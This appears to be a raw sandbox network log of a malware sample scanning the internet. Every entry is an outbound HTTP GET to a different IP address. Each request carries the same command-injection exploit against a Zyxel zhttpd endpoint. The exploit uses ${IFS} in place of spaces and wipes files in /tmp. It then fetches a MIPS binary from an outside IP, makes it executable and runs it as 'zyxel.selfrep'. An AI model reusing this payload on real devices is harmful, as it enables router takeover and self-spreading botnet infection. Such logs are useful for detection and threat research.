                                            Jan 14, 2024 15:50:46.568531990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6154192.168.2.2359720159.136.167.80443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.568561077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6155192.168.2.2333382186.238.121.86443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.568593025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6156192.168.2.235196052.136.55.47443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.568638086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6157192.168.2.2336864173.138.159.105443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.568645954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6158192.168.2.2355438198.56.78.89443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.568686962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6159192.168.2.2348892205.11.24.224443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.568711042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6160192.168.2.23366488.104.8.185443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.568734884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6161192.168.2.2349298185.225.216.17443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.568789005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6162192.168.2.235720866.101.139.79443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.568824053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6163192.168.2.235181293.92.217.114443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.568845987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6164192.168.2.233630647.27.182.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.568876982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6165192.168.2.2348902181.230.60.210443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.568883896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6166192.168.2.233898035.146.157.104443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.568943024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6167192.168.2.2338212206.100.175.204443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.568957090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6168192.168.2.234821441.44.65.71443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.569010973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6169192.168.2.2351010124.252.188.30443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.569024086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6170192.168.2.2345506125.62.171.229443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.569068909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6171192.168.2.2334046108.2.192.234443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.569097996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6172192.168.2.234701619.18.236.147443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.569118023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6173192.168.2.234137412.1.32.51443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.569164038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6174192.168.2.2339978160.147.139.231443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.569190979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6175192.168.2.234141038.133.15.107443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.569231033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6176192.168.2.2347018105.52.151.212443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.569247961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6177192.168.2.2341474190.42.85.145443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.569281101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6178192.168.2.234475414.254.105.70443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.569320917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6179192.168.2.234378091.186.217.221443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.569343090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6180192.168.2.234576261.72.76.122443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.569384098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6181192.168.2.236097662.93.188.132443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.569415092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6182192.168.2.235074060.209.106.13443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.569437981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6183192.168.2.234222037.17.103.198443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.569463015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6184192.168.2.233612250.245.0.116443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.569497108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6185192.168.2.2345810197.188.77.150443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.569561005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6186192.168.2.234514049.94.87.100443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.569582939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6187192.168.2.2334440205.122.11.239443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.569606066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6188192.168.2.2333944159.209.164.21443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.569653988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6189192.168.2.2342948209.130.165.255443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.569675922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6190192.168.2.2358260207.20.218.101443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.569696903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6191192.168.2.2350472167.187.124.159443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.569727898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6192192.168.2.2345936126.139.215.116443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.569756031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6193192.168.2.2343266203.12.227.162443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.569780111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6194192.168.2.2341576138.102.29.70443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.569818020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6195192.168.2.2344040161.204.166.19443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.569845915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6196192.168.2.2342230116.21.23.87443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.569876909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6197192.168.2.2342814113.106.11.238443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.569901943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6198192.168.2.234508664.70.89.169443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.569952965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6199192.168.2.2360424155.154.90.188443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.569986105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6200192.168.2.2350478159.180.120.123443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.570043087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6201192.168.2.2334652174.196.116.49443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.570069075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6202192.168.2.2337810167.91.209.111443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.570097923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6203192.168.2.234334865.254.128.200443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.570120096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6204192.168.2.2350302171.216.208.16443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.570171118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6205192.168.2.2349842210.26.193.176443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.570183039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6206192.168.2.2348700209.22.13.30443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.570215940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6207192.168.2.2354242175.169.201.61443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.570242882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6208192.168.2.234868493.64.225.183443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.570295095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6209192.168.2.2350910148.181.130.209443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.570310116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6210192.168.2.235427618.86.49.224443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.570354939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6211192.168.2.235859846.48.184.122443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.570382118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6212192.168.2.2338888169.244.38.155443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.570420027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6213192.168.2.235539069.13.59.14443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.570439100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6214192.168.2.2333888197.35.252.64443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.570488930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6215192.168.2.234502864.1.218.5443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.570512056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6216192.168.2.2338286173.108.168.226443
                                            TimestampBytes transferredDirectionData
